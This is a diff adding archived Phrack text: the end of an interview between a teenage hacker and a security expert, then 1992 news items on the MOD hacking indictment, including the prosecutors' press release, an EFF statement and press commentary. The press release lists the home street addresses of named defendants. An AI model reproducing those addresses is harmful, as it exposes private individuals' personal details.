+        am, they couldn't even begin to grasp things that I've experienced.
+
+PARKER: OK, so you want instant gratification then.
+
+OPTIK:  It's not so much gratification . . .
+
+PARKER: You're not willing to spend four years in a--
+
+OPTIK:  I certainly am willing to go to college.
+
+PARKER: Uh huh.
+
+OPTIK:  I definitely intend to go to college; I just don't expect to learn very
+        much concerning technology. I do expect to learn some things about
+        technology I probably didn't know, but I don't expect to be exposed to
+        such a diverse amount of technology as in my teenage years.
+
+PARKER: OK, well, I can see impatience and a lack of opportunity to do all
+        that stuff very quickly, but--
+
+OPTIK:  I wouldn't go so far as to call it impatience.  I'd call it an
+        eagerness to learn.
+
+PARKER: Eagerness to learn can be applied in the establishment process of
+        education in all kinds of ways.  You can excel in school.
+
+OPTIK:  I was never Mr. Academia, I can tell you that right off the bat.  I
+        don't find much of interest in school.  Usually I make up for it by
+        reading technology manuals instead.
+
+PARKER: How are you going to spend four years in school if you've already
+        decided you're really not suited to be in school?
+
+OPTIK:  Well, it's not so much school as it is that I feel constrained being in
+        high school and having to go through junior high school and high school
+        because of the way the educational program are tailored to like, you
+        know --
+
+PARKER: Well, if you hold this direction that you're going right now, you could
+        very well end up as a technician repairing equipment, maintaining
+        computers, and you could very well end up in a dead-end job.
+
+        In order to break into a higher level of work, you need a ticket, you
+        need a degree, you have to prove that you have been able to go to
+        school and get acceptable grades.  The route that you're going doesn't
+        seem to me to lead to that.
+
+        Now there are some people who have managed to overcome that, OK --
+        Geoff Goodfellow.  Steve Wozniak.  But those people are 1 out of
+        100,000.  All the other 99,000-odd people are technicians.  They're
+        leading reasonable lives, making a reasonable income, but they're not
+        doing very big things.  They're keeping equipment running.
+
+OPTIK:  Yeah.
+
+PARKER: And if you have all this curiosity and all this drive and this energy
+        (which is what it takes), and you go a route that gets you to a
+        position where you can do real, exciting, advanced research . . .  I
+        mean, I've talked to a lot of hackers.  I'm thinking of one in
+        Washington, D.C., who was convicted of a computer crime.  He went back
+        to school, he's got his degree, and he has a very top systems
+        programming job.  He said he finally reached a point where he decided
+        he had to change the way he was going about this, because the way
+        things were going, the future for him was pretty bleak.
+
+        And it seems to me, hopefully, you may come to a realization that to
+        do important things, exciting things, ultimately you've got to learn
+        the computer-science way of presenting operating systems, and how to
+        write programs of a very large, complex nature.
+
+        Have you ever done that, have you ever written a really big computer
+        program?
+
+OPTIK:  I've written this . . .
+
+PARKER: There's a discipline involved that has to do with learning how to be an
+        engineer.  It takes a tremendous amount of education and discipline.
+        And it sounds to me like you lack the discipline.  You want instant
+        gratification, you want to be an expert now.  And you end up being an
+        expert all right, but in a very narrow range of technology.
+
+        You learn the Novell LAN, you learn some other aspect, you learn about
+        a telephone company's switching system.  That doesn't lead to a career
+        in designing and developing systems.  That leads to a career in
+        maintaining the kind of hardware that you've been hacking.
+
+        And it seems to me you've got to go back and learn the principles.
+        What are the basic principles of an operating system?  What are the
+        basic principles of access control?  Until you've gone back and learned
+        those basics, you're flying by the seat of your pants, and just picking
+        up odds and ends of stuff that you can grab quickly.
+
+OPTIK:  I don't see it so much as grabbing things quickly.  I've put a lot of
+        time into studying very detailed things.  It's not so much popping in
+        and popping out and whatever I find I'm glad I found it.  I do spend a
+        lot of time studying manuals and things.
+
+PARKER: Manuals are not going to do it.  All you do in learning a manual is
+        learn the current equipment and how it works.  If you studied Donald
+        Kanuth's volumes on computer science programming and computer sciences,
+        you would learn the theory of computer programming, you would learn
+        the operating system theory, you would learn the theory that is the
+        foundation on which all of these systems are built.
+
+OPTIK:  But that's the thing I guess I don't do. I was never much concerned
+        with theory of operation.  I was always concerned with how things work,
+        and how I can use them.  Like how to program.  I'll admit I was never
+        much into theory.  It never interested me.  Like with what I do-theory
+        really doesn't play any role at the present time.  Of course, that's
+        subject to change at any time.  I'm rather young . . .
+
+A FRIEND WHISPERED in Optik's ear that it was time to go.  Still locked in
+debate, the hacker and the security man left the table and walked together
+toward the escalator.  In profile, at the bottom of the moving stairs, they
+were an odd couple:  Optik with his shiny, jet black hair, Parker with his
+shiny dome.
+
+Parker was speaking calmly, warning Optik that one day hacking wouldn't seem
+so boundless, that one day his opportunities wouldn't seem quite so vast.
+Optik fidgeted, glancing away.  Conference attendees filed up the escalator.
+
+"I don't want to be a hacker forever," blurted Optik.
+
+The next afternoon the bank of hotel phones was crowded with business people
+and conference attendees punching in to get their messages and make their
+calls.  There was Optik, wedged between the suits, acoustic coupler slipped
+over the phone receiver, a laptop screen flickering before his eyes, his hands
+flitting over the keys.
+
+He was still young.
diff --git a/phrack40/13.txt b/phrack40/13.txt
new file mode 100644
index 0000000..acd458b
--- /dev/null
+++ b/phrack40/13.txt
@@ -0,0 +1,848 @@
+                                ==Phrack Inc.==
+
+                    Volume Four, Issue Forty, File 13 of 14
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue 40 / Part 2 of 3            PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ MOD Indicted                                                      July 8, 1992
+ ~~~~~~~~~~~~
+ Taken from U.S. Newswire
+
+The following is the press release issued by the United States Attorney's
+Office in the Southern District of New York.
+
+                      Group of "Computer Hackers" Indicted
+                      First Use of Wiretaps in Such a Case
+
+NEW YORK -- A group of five "computer hackers" has been indicted on charges of
+computer tampering, computer fraud, wire fraud, illegal wiretapping, and
+conspiracy, by a federal grand jury in Manhattan, resulting from the first
+investigative use of court-authorized wiretaps to obtain conversations and data
+transmissions of computer hackers.
+
+A computer hacker is someone who uses a computer or a telephone to obtain
+unauthorized access to other computers.
+
+The indictment, which was filed today, alleges that Julio Fernandez, a/k/a
+"Outlaw," John Lee, a/k/a "Corrupt," Mark Abene, a/k/a "Phiber Optik," Elias
+Ladopoulos, a/k/a "Acid Phreak," and Paul Stira, a/k/a "Scorpion," infiltrated
+a wide variety of computer systems, including systems operated by telephone
+companies, credit reporting services, and educational institutions.
+
+According to Otto G. Obermaier, United States Attorney for the Southern
+District of New York, James E. Heavey, special agent in charge, New York Field
+Division, United States Secret Service, William Y. Doran, special agent in
+charge, Criminal Division, New York Field Division, Federal Bureau of
+Investigation, and Scott Charney, chief of the Computer Crime Unit of the
+Department of Justice, the indictment charges that the defendants were part of
+a closely knit group of computer hackers self-styled "MOD," an acronym used
+variously for "Masters of Disaster" and "Masters of Deception" among other
+things.
+
+The indictment alleges that the defendants broke into computers "to enhance
+their image and prestige among other computer hackers; to harass and intimidate
+rival hackers and other people they did not like; to obtain telephone, credit,
+information and other services without paying for them; and to obtain
+passwords, account numbers and other things of value which they could sell to
+others."
+
+The defendants are also alleged to have used unauthorized passwords and billing
+codes to make long distance telephone calls and to be able to communicate with
+other computers for free.
+
+Some of the computers that the defendants allegedly broke into were telephone
+switching computers operated by Southwestern Bell, New York Telephone, Pacific
+Bell, U.S. West and Martin Marietta Electronics Information and Missile Group.
+According to the indictment, such switching computers each control telephone
+service for tens of thousands of telephone lines.
+
+In some instances, the defendants allegedly tampered with the computers by
+adding and altering calling features.  In some cases, the defendants allegedly
+call forwarded local numbers to long distance numbers and thereby obtained long
+distance services for the price of a local call. Southwestern Bell is alleged
+to have incurred losses of approximately $370,000 in 1991 as a result of
+computer tampering by defendants Fernandez, Lee, and Abene.
+
+The indictment also alleges that the defendants gained access to computers
+operated by BT North America, a company that operates the Tymnet data transfer
+network.  The defendants were allegedly able to use their access to Tymnet
+computers to intercept data communications while being transmitted through the
+network, including computer passwords of Tymnet employees.  On one occasion,
+Fernandez and Lee allegedly intercepted data communications on a network
+operated by the Bank of America.
+
+The charges also allege that the defendants gained access to credit and
+information services including TRW, Trans Union and Information America.  The
+defendants allegedly were able to obtain personal information on people
+including credit reports, telephone numbers, addresses, neighbor listings and
+social security numbers by virtue of their access to these services.  On one
+occasion Lee and another member of the group are alleged to have discussed
+obtaining information from another hacker that would allow them to alter credit
+reports on TRW.  As quoted in the indictment, Lee said that the information he
+wanted would permit them "to destroy people's lives... or make them look like
+saints."
+
+The indictment further charges that in November 1991, Fernandez and Lee sold
+information to Morton Rosenfeld concerning how to access credit services.  The
+indictment further alleges that Fernandez later provided Rosenfeld's associates
+with a TRW account number and password that Rosenfeld and his associates used
+to obtain approximately 176 TRW credit reports on various individuals.  (In a
+separate but related court action, Rosenfeld pleaded guilty to conspiracy to
+use and traffic in account numbers of TRW.  See below).
+
+According to Stephen Fishbein, the assistant United States attorney in charge
+of the prosecution, the indictment also alleges that members of MOD wiped out
+almost all of the information contained within the Learning Link computer
+operated by the Educational Broadcasting Corp. (WNET Channel 13) in New York
+City.  The Learning Link computer provided educational and instructional
+information to hundreds of schools and teachers in New York, New Jersey and
+Connecticut.  Specifically, the indictment charges that on November 28, 1989,
+the information on the Learning Link was destroyed and a message was left on
+the computer that said: "Happy Thanksgiving you turkeys, from all of us at MOD"
+and which was signed with the aliases "Acid Phreak," "Phiber Optik," and
+"Scorpion."  During an NBC News broadcast on November 14, 1990, two computer
+hackers identified only by the aliases "Acid Phreak" and "Phiber Optik" took
+responsibility for sending the "Happy Thanksgiving" message.
+
+Obermaier stated that the charges filed today resulted from a joint
+investigation by the United States Secret Service and the Federal Bureau of
+Investigation.  "This is the first federal investigation ever to use court-
+authorized wiretaps to obtain conversations and data transmissions of computer
+hackers," said Obermaier.  He praised both the Secret Service and the FBI for
+their extensive efforts in this case.  Obermaier also thanked the Department of
+Justice Computer Crime Unit for their important assistance in the
+investigation.  Additionally, Obermaier thanked the companies and institutions
+whose computer systems were affected by the defendants' activities, all of whom
+cooperated fully in the investigation.
+
+Fernandez, age 18, resides at 3448 Steenwick Avenue, Bronx, New York.  Lee
+(also known as John Farrington), age 21, resides at 64A Kosciusco Street,
+Brooklyn, New York.  Abene, age 20, resides at 94-42 Alstyne Avenue, Queens,
+New York.  Elias Ladopoulos, age 22, resides at 85-21 159th Street, Queens, New
+York.  Paul Stira, age 22, resides at 114-90 227th Street, Queens, New York.
+The defendants' arraignment has been scheduled for July 16, at 10 AM in
+Manhattan federal court.
+
+The charges contained in the indictment are accusations only and the defendants
+are presumed innocent unless and until proven guilty.  Fishbein stated that if
+convicted, each of the defendants may be sentenced to a maximum of five years
+imprisonment on the conspiracy count.  Each of the additional counts also
+carries a maximum of five years imprisonment, except for the count charging
+Fernandez with possession of access devices, which carries a maximum of ten
+years imprisonment.  Additionally, each of the counts carries a maximum fine of
+the greater of $250,000, or twice the gross gain or loss incurred.
+
+- - - - - - - - - - - - - - - - - -  - - - - - - - - - - - - - - - - - - - - -
+
+In separate but related court actions, it was announced that Rosenfeld and
+Alfredo De La Fe [aka Renegade Hacker] have each pleaded guilty in Manhattan
+Federal District Court to conspiracy to use and to traffic in unauthorized
+access devices in connection with activities that also involved members of MOD.
+
+Rosenfeld pled guilty on June 24 before Shirley Wohl Kram, United States
+District Judge.  At his guilty plea, Rosenfeld admitted that he purchased
+account numbers and passwords for TRW and other credit reporting services from
+computer hackers and then used the information to obtain credit reports, credit
+card numbers, social security numbers and other personal information which he
+sold to private investigators.  Rosenfeld added in his guilty plea that on or
+about November 25, 1991, he purchased information from persons named "Julio"
+and "John" concerning how to obtain unauthorized access to credit services.
+Rosenfeld stated that he and his associates later obtained additional
+information from "Julio" which they used to pull numerous credit reports.
+According to the information to which Rosenfeld pleaded guilty, he had
+approximately 176 TRW credit reports at his residence on December 6, 1991.
+
+De La Fe pled guilty on June 19 before Kenneth Conboy, United States District
+Judge.  At his guilty plea, De La Fe stated that he used and sold telephone
+numbers and codes for Private Branch Exchanges ("PBXs").  According to the
+information to which De La Fe pleaded guilty, a PBX is a privately operated
+computerized telephone system that routes calls, handles billing, and in some
+cases permits persons calling into the PBX to obtain outdial services by
+entering a code.  De La Fe admitted that he sold PBX numbers belonging to Bugle
+Boy Industries and others to a co-conspirator who used the numbers in a call
+sell operation, in which the co-conspirator charged others to make long
+distance telephone calls using the PBX numbers.  De La Fe further admitted that
+he and his associates used the PBX numbers to obtain free long distance
+services for themselves.  De La Fe said that one of the people with whom he
+frequently made free long distance conference calls was a person named John
+Farrington, who he also knew as "Corrupt."
+
+Rosenfeld, age 21, resides at 2161 Bedford Avenue, Brooklyn, N.Y. Alfredo De La
+Fe, age 18, resides at 17 West 90th Street, N.Y. Rosenfeld and De La Fe each
+face maximum sentences of five years, imprisonment and maximum fines of the
+greater of $250,000, or twice the gross gain or loss incurred.  Both defendants
+have been released pending sentence on $20,000 appearance bonds.  Rosenfeld's
+sentencing is scheduled for September 9, before Shirley Wohl Kram.  De La Fe's
+sentencing is scheduled for August 31, before Conboy.
+
+-----
+
+Contacts:
+
+Federico E. Virella Jr., 212-791-1955, U.S. Attorney's Office, S. N.Y.
+Stephen Fishbein, 212-791-1978, U.S. Attorney's Office, S. N.Y.
+Betty Conkling, 212-466-4400, U.S. Secret Service
+Joseph Valiquette Jr., 212-335-2715, Federal Bureau of Investigation
+
+Editor's Note:  The full 23 page indictment can be found in Computer
+                Underground Digest (CUD), issue 4.31 (available at ftp.eff.org
+                /pub/cud/cud).
+_______________________________________________________________________________
+
+ EFF Issues Statement On New York Computer Crime Indictments       July 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Cambridge, MA -- The Electronic Frontier Foundation (EFF) issued a statement
+concerning the indictment of MOD for alleged computer-related crimes.
+
+This statement said, in part, that EFF's "staff counsel in Cambridge, Mike
+Godwin is carefully reviewing the indictment."
+
+EFF co-founder and president Mitchell Kapor said "EFF's position on
+unauthorized access to computer systems is, and has always been, that it is
+wrong.  Nevertheless, we have on previous occasions discovered that allegations
+contained in Federal indictments can also be wrong, and that civil liberties
+can be easily infringed in the information age.  Because of this, we will be
+examining this case closely to establish the facts."
+
+When asked how long the complete trial process might take, assistant U.S.
+attorney Fishbein said "I really couldn't make an accurate estimate.  The
+length of time period before trial is generally more a function of the
+defense's actions than the prosecution's.  It could take anywhere from six
+months to a year.
+_______________________________________________________________________________
+
+ Feds Tap Into Major Hacker Ring                                  July 13, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Mary E. Thyfault (InformationWeek)(Page 15)
+
+Law enforcement officials are taking the gloves off-and plugging their modems
+in-in the battle against computer crime.
+
+In one of the largest such cases ever, a federal grand jury in Manhattan
+indicted five computer "hackers" -- part of a group that calls itself MOD, for
+Masters of Deception -- on charges of computer tampering, computer fraud, wire
+fraud, illegal wiretapping, and conspiracy.
+
+Some of the hackers are accused of stealing phone service and selling
+information on how to obtain credit reports.  The victims (a dozen were named
+in the indictments, but numerous others are likely to have been hit as well)
+include three Baby Bells, numerous credit bureaus, and BankAmerica Corp.
+
+For the first time, investigators used court-authorized wiretaps to monitor
+data transmissions over phone lines. The wiretapping comes as the FBI is
+unsuccessfully lobbying Congress to mandate that telecom equipment and service
+companies build into new technology easier ways for securities agencies to tap
+into computer systems.
+
+Ironically, the success of this wiretap, some say, may undermine the FBI's
+argument.  "They did this without the equipment they claim they need," says
+Craig Neidorf, founder of hacker newsletter Phrack.
+
+If convicted, the alleged hackers-all of whom are under 22 years old-could face
+55 years each and a fine of $250,000, or twice the gross gain or loss incurred.
+One charged with possessing an access device could face an additional five
+years.
+
+The vulnerability of the victims' networks should be surprising, but experts
+say corporations continue to pay scant attention to security issues.  For
+instance, despite the fact that the credit bureaus are frequent targets of
+hackers and claim to have made their networks more secure, in this case, most
+of the victims didn't even know they were being hit, according to the FBI.
+
+Two of the victims, value-added network service provider BT Tymnet and telco
+Southwestern Bell, both take credit for helping nab the hacker ring.  "We
+played an instrumental role in first recognizing that they were there," says
+John Guinasso, director of global network security for Tymnet parent BT North
+America.  "If you mess with our network and we catch you -- which we always do
+-- you will go down."
+_______________________________________________________________________________
+
+ Second Thoughts On New York Computer Crime Indictments           July 13, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By John F. McMullen (Newsbytes)
+
+NEW YORK -- On Wednesday, July 9th, I sat at a press briefing in New York
+City's Federal Court Building during which law enforcement officials presented
+details relating to the indictment of 5 young computer "hackers".  In
+describing the alleged transgressions of the indicted, United States Assistant
+Attorney Stephen Fishbein wove a tale of a conspiracy in which members of an
+evil sounding group called the "Masters of Destruction" (MOD) attempted to
+wreck havoc with the telecommunications system of the country.
+
+The accused were charged with infiltrating computer systems belonging to
+telephone companies, credit bureaus, colleges and defense contractors --
+Southwestern Bell, BT North America, New York Telephone, ITT, Information
+America, TRW, Trans Union, Pacific Bell, the University of Washington, New York
+University, U.S. West, Learning Link, Tymnet and Martin Marietta Electronics
+Information and Missile Group.  They were charged with causing injury to the
+telephone systems, charging long distance calls to the universities, copying
+private credit information and selling it to third parties -- a long list of
+heinous activities.
+
+The immediate reaction to the indictments were predictably knee-jerk.  Those
+who support any so-called "hacker"-activities mocked the government and the
+charges that were presented, forgetting, it seems to me, that these charges are
+serious -- one of the accused could face up to 40 years in prison and $2
+million in fines; another -- 35 years in prison and $1.5 million in fines.  In
+view of that possibility, it further seems to me that it is a wasteful
+diversion of effort to get all excited that the government insists on misusing
+the word "hacker" (The indictment defines computer hacker as "someone who uses
+a computer or a telephone to obtain unauthorized access to other computers.")
+or that the government used wiretapping evidence to obtain the indictment (I
+think that, for at least the time being that the wiretapping was carried out
+under a valid court order; if it were not, the defendants' attorneys will have
+a course of action).
+
+On the other hand, those who traditionally take the government and corporate
+line were publicly grateful that this threat to our communications life had
+been removed -- they do not in my judgement properly consider that some of
+these charges may have been ill-conceived and a result of political
+considerations.
+
+Both groups, I think, oversimplify and do not give proper consideration to the
+wide spectrum of issues raised by the indictment document.  The issues range
+from a simple black-and-white case of fraudulently obtaining free telephone
+time to the much broader question of the appropriate interaction of technology
+and law enforcement.
+
+The most clear cut cases are the charges such as the ones which allege that two
+of the indicted, Julio Fernandez a/k/a "Outlaw" and John Lee a/k/a "Corrupt"
+fraudulently used the computers of New York University to avoid paying long
+distance charges for calls to computer systems in El Paso, Texas and Seattle,
+Washington.  The individuals named either did or did not commit the acts
+alleged and, if it is proven that they did, they should receive the appropriate
+penalty (it may be argued that the 5 year, $250,000 fine maximum for each of
+the counts in this area is excessive, but that is a sentencing issue not an
+indictment issue).
+
+Other charges of this black-and-white are those that allege that Fernandez
+and/or Lee intercepted electronic communications over networks belonging to
+Tymnet and the Bank of America.  Similarly, the charge that Fernandez, on
+December 4, 1991 possessed hundreds of user id's and passwords of Southwestern
+Bell, BT North America and TRW fits in the category of "either he did it or he
+didn't."
+
+A more troubling count is the charge that the indicted 5 were all part of a
+conspiracy to "gain access to and control of computer systems in order to
+enhance their image and prestige among other computer hackers; to harass
+and intimidate rival hackers and people they did not like; to obtain telephone,
+credit, information, and other services without paying for them; and to obtain
+passwords, account numbers and other things of value which they could sell to
+others."
+
+To support this allegation, the indictment lists 26, lettered A through Z,
+"Overt Acts" to support the conspiracy.  While this section of the indictment
+lists numerous telephone calls between some of the individuals, it mentions
+the name Paul Stira a/k/a "Scorpion" only twice with both allegations dated
+"on or about" January 24, 1990, a full 16 months before the next chronological
+incident. Additionally, Stira is never mentioned as joining in any of the
+wiretapped conversation -- in fact, he is never mentioned again!  I find it
+hard to believe that he could be considered, from these charges, to have
+engaged in a criminal conspiracy with any of the other defendants.
+
+Additionally, some of the allegations made under the conspiracy count seem
+disproportionate to some of the others.  Mark Abene a/k/a "Phiber Optik" is of
+possessing proprietary technical manuals belonging to BT North America while it
+is charged that Lee and Fernandez, in exchange for several hundred dollars,
+provided both information on how to illegally access credit reporting bureaus
+and an actual TRW account and password to a person, Morton Rosenfeld, who later
+illegally accessed TRW, obtained credit reports on 176 individuals and sold the
+reports to private detective (Rosenfeld, indicted separately, pled guilty to
+obtaining and selling the credit reports and named "Julio" and "John" as those
+who provided him with the information).  I did not see anywhere in the charges
+any indication that Abene, Stira or Elias Ladopoulos conspired with or likewise
+encouraged Lee or Fernandez to sell information involving the credit bureaus to
+a third party
+
+Another troubling point is the allegation that Fernandez, Lee, Abene and
+"others whom they aided and abetted" performed various computer activities
+"that caused losses to Southwestern Bell of approximately $370,000."  The
+$370,000 figure, according to Assistant United States Attorney Stephen
+Fishbein, was developed by Southwestern Bell and is based on "expenses to
+locate and replace computer programs and other information that had been
+modified or otherwise corrupted, expenses to determine the source of the
+unauthorized intrusions, and expenses for new computers and security devices
+that were necessary to prevent continued unauthorized access by the defendants
+and others whom they aided and abetted."
+
+While there is precedent in assigning damages for such things as "expenses
+for new computers and security devices that were necessary to prevent continued
+unauthorized access by the defendants and others whom they aided and abetted."
+(the Riggs, Darden & Grant case in Atlanta found that the defendants were
+liable for such expenses), many feel that such action is totally wrong.  If a
+person is found uninvited in someone's house, they are appropriately charged
+with unlawful entry, trespassing, burglary -- whatever the statute is for the
+transgression; he or she is, however, not charged with the cost of the
+installation of an alarm system or enhanced locks to insure that no other
+person unlawfully enters the house.
+
+When I discussed this point with a New York MIS manager, prone to take a strong
+anti-intruder position, he said that an outbreak of new crimes often results in
+the use of new technological devices such as the nationwide installation of
+metal detectors in airports in the 1970's.  While he meant this as a
+justification for liability, the analogy seems rather to support the contrary
+position.  Air line hijackers were prosecuted for all sorts of major crimes;
+they were, however, never made to pay for the installation of the metal
+detectors or absorb the salary of the additional air marshalls hired to combat
+hijacking.
+
+I think the airline analogy also brings out the point that one may both support
+justifiable penalties for proven crimes and oppose unreasonable ones -- too
+often, when discussing these issues, observers choose one valid position to the
+unnecessary exclusion of another valid one.  There is nothing contradictory, in
+my view, to holding both that credit agencies must be required to provide the
+highest possible level of security for data they have collected AND that
+persons invading the credit data bases, no matter how secure they are, be held
+liable for their intrusions.  We are long past accepting the rationale that the
+intruders "are showing how insecure these repositories of our information are."
+We all know that the lack of security is scandalous; this fact, however, does
+not excuse criminal behavior (and it should seem evident that the selling of
+electronic burglar tools so that someone may copy and sell credit reports is
+not a public service).
+
+The final point that requires serious scrutiny is the use of the indictment as
+a tool in the on-going political debate over the FBI Digital Telephony
+proposal.  Announcing the indictments, Otto G. Obermaier, United States
+Attorney for the Southern District of New York, said that this investigation
+was "the first investigative use of court-authorized wiretaps to obtain
+conversations and data transmissions of computer hackers."  He said that this
+procedure was essential to the investigation and that "It demonstrates, I
+think, the federal government's ability to deal with criminal conduct as it
+moves into new technological areas."  He added that the interception of data
+was possible only because the material was in analog form and added "Most of
+the new technology is in digital form and there is a pending statute in
+Congress which seeks the support of telecommunications companies to allow the
+federal government, under court authorization, to intercept digital
+transmission.  Many of you may have read the newspaper about the laser
+transmission which go through fiber optics as a method of the coming
+telecommunications method. The federal government needs the help of Congress
+and, indeed, the telecommunications companies to able to intercept digital
+communications."
+
+The FBI proposal has been strongly attacked by the American Civil Liberties
+Union (ACLU), the Electronic Frontier Foundation (EFF) and Computer
+Professionals for Social Responsibility (CPSR) as an attempt to
+institutionalize, for the first time, criminal investigations as a
+responsibility of the communications companies; a responsibility that they feel
+belongs solely to law-enforcement.  Critics further claim that the proposal
+will impede the development of technology and cause developers to have to
+"dumb-down" their technologies to include the requested interception
+facilities.  The FBI, on the other hand, maintains that the request is simply
+an attempt to maintain its present capabilities in the face of advancing
+technology.
+
+Whatever the merits of the FBI position, it seems that the indictments either
+would not have been made at this time or, at a minimum, would not have been
+done with such fanfare if it were not for the desire to attempt to drum up
+support for the pending legislation.  The press conference was the biggest
+thing of this type since the May 1990 "Operation Sun Devil" press conference in
+Phoenix, Arizona and, while that conference, wowed us with charges of "hackers"
+endangering lives by disrupting hospital procedures and being engaged in a
+nationwide, 13 state conspiracy, this one told us about a bunch of New York
+kids supposedly engaged in petty theft, using university computers without
+authorization and performing a number of other acts referred to by Obermaier as
+"anti-social behavior" -- not quite as heady stuff!
+
+It is not to belittle these charges -- they are quite serious -- to question
+the fanfare.  The conference was attended by a variety of high level Justice
+Department, FBI and Secret Service personnel and veteran New York City crime
+reporters tell me that the amount of alleged damages in this case would
+normally not call for such a production -- New York Daily News reporter Alex
+Michelini publicly told Obermaier "What you've outlined, basically, except for
+the sales of credit information, this sounds like a big prank, most of it"
+(Obermaier's response -- "Well, I suppose you can characterize that as a prank,
+but it's really a federal crime allowing people without authorization to
+rummage through the data of other people to which they do not have access and,
+as I point out to you again, the burglar cannot be your safety expert.  He may
+be inside and laugh at you when you come home and say that your lock is not
+particularly good but I think you, if you were affected by that contact, would
+be somewhat miffed").  One hopes that it is only the fanfare surrounding the
+indictments that is tied in with the FBI initiative and not the indictments
+themselves.
+
+As an aside, two law enforcement people that I have spoken to have said that
+while the statement that the case is "the first investigative use of court-
+authorized wiretaps to obtain conversations and data transmissions of computer
+hackers," while probably true, seems to give the impression that the case is
+the first one in which data transmission was intercepted.  According to these
+sources, that is far from the case -- there have been many instances of
+inception of data and fax information by law enforcement officials in recent
+years.
+
+I know each of the accused in varying degrees.  The one that I know the best,
+Phiber Optik, has participated in panels with myself and law enforcement
+officials discussing issues relating to so-called "hacker" crime.  He has also
+appeared on various radio and television shows discussing the same issues.  His
+high profile activities have made him an annoyance to some in law enforcement.
+One hopes that this annoyance played no part in the indictment.
+
+I have found Phiber's presence extremely valuable in these discussions both for
+the content and for the fact that his very presence attracts an audience that
+might never otherwise get to hear the voices of Donald Delaney, Mike Godwin,
+Dorothy Denning and others addressing these issues from quite different vantage
+points.  While he has, in these appearances, said that he has "taken chances to
+learn things", he has always denied that he has engaged in vandalous behavior
+and criticized those who do.  He has also called those who engage in "carding"
+and the like as criminals (These statements have been made not only in the
+panel discussion, but also on the occasions that he has guest lectured to my
+class in "Connectivity" at the New School For Social Research in New York City.
+In those classes, he has discussed the history of telephone communications in a
+way that has held a class of professionals enthralled by over two hours.
+
+While my impressions of Phiber or any of the others are certainly not a
+guarantee of innocence on these charges, they should be taken as my personal
+statement that we are not dealing with a ring of hardened criminals that one
+would fear on a dark night.
+
+In summary, knee-jerk reactions should be out and thoughtful analysis in!  We
+should be insisting on appropriate punishment for lawbreakers -- this means
+neither winking at "exploration" nor allowing inordinate punishment.  We should
+be insisting that companies that have collected data about us properly protect
+-- and are liable for penalties when they do not.  We should not be deflected
+from this analysis by support or opposition to the FBI proposal before Congress
+-- that requires separate analysis and has nothing to do with the guilt or
+innocence of these young men or the appropriate punishment should any guilt be
+established.
+_______________________________________________________________________________
+
+ New York Hackers Plead Not Guilty                                July 17, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+New York City -- At an arraignment in New York Federal Court on Thursday, July
+16th, the five New York "hackers," recently indicted on charges relating to
+alleged computer intrusion, all entered pleas of not guilty and were released
+after each signed a personal recognizance (PRB) bond of $15,000 to guarantee
+continued appearances in court.
+
+As part of the arraignment process, United States District Judge Richard Owen
+was assigned as the case's presiding judge and a pre-trial meeting between the
+judge and the parties involved.
+
+Charles Ross, attorney for John Lee, told Newsbytes "John Lee entered a not
+guilty plea and we intend to energetically and aggressively defend against the
+charges made against him."
+
+Ross also explained the procedures that will be in effect in the case, saying
+"We will meet with the judge and he will set a schedule for discovery and the
+filing of motions.  The defense will have to review the evidence that the
+government has amassed before it can file intelligent motions and the first
+meeting is simply a scheduling one."
+
+Majorie Peerce, attorney for Stira, told Newsbytes "Mr. Stira has pleaded not
+guilty and will continue to plead not guilty.  I am sorry to see the government
+indict a 22 year old college student for acts that he allegedly committed as a
+19 year old."
+
+The terms of the PRB signed by the accused require them to remain within the
+continental United States.  In requesting the bond arrangement, Assistant
+United States Attorney Stephen Fishbein referred to the allegations as serious
+and requested the $15,000 bond with the stipulation that the accused have their
+bonds co-signed by parents.  Abene, Fernandez and Lee, through their attorneys,
+agreed to the bond as stipulated while the attorneys for Ladopoulos and Stira
+requested no bail or bond for their clients, citing the fact that their clients
+have been available, when requested by authorities, for over a year.  After
+consideration by the judge, the same $15,000 bond was set for Ladopoulos and
+Stira but no co-signature was required.
+_______________________________________________________________________________
+
+ Young Working-Class Hackers Accused of High-Tech Crime           July 23, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Mary B.W. Tabor with Anthony Ramirez (The New York Times)(Page B1, B7)
+
+                        Computer Savvy, With an Attitude
+
+Late into the night, in working-class neighborhoods around New York City, young
+men with code names like Acid Phreak and Outlaw sat hunched before their
+glowing computer screens, exchanging electronic keys to complex data-processing
+systems.  They called themselves the Masters of Deception.  Their mission: to
+prove their prowess in the shadowy computer underworld.
+
+Compulsive and competitive, they played out a cybernetic version of "West Side
+Story," trading boasts, tapping into telephone systems, even pulling up
+confidential credit reports to prove their derring-do and taunt other hackers.
+Their frequent target was the Legion of Doom, a hacker group named after a
+gang of comic-book villains.  The rivalry seemed to take on class and ethnic
+overtones, too, as the diverse New York group defied the traditional image of
+the young suburban computer whiz.
+
+But Federal prosecutors say the members of MOD, as the group called itself,
+went far beyond harmless pranks.
+
+Facing Federal Charges
+
+On July 16, five young men identified by prosecutors as MOD members pleaded not
+guilty to Federal charges including breaking into some of the nation's most
+powerful computers and stealing confidential data like credit reports, some of
+which were later sold to private investigators.  Prosecutors call it one of the
+most extensive thefts of computer information ever reported.
+
+The indictment says the men entered the computer systems of Southwestern Bell,
+TRW Information Services and others "to enhance their image and prestige among
+other computer hackers; to harass and intimidate rival hackers and other people
+they did not like; to obtain telephone, credit, information and other services
+without paying for them; and to obtain passwords, account numbers and other
+things of value which they could sell to others."
+
+With modems that link their terminals to other computers over ordinary
+telephone lines, young hackers have been making mischief for years.  But as the
+nation relies more and more on vast networks of powerful computers and as
+personal computers become faster and cheaper, the potential for trouble has
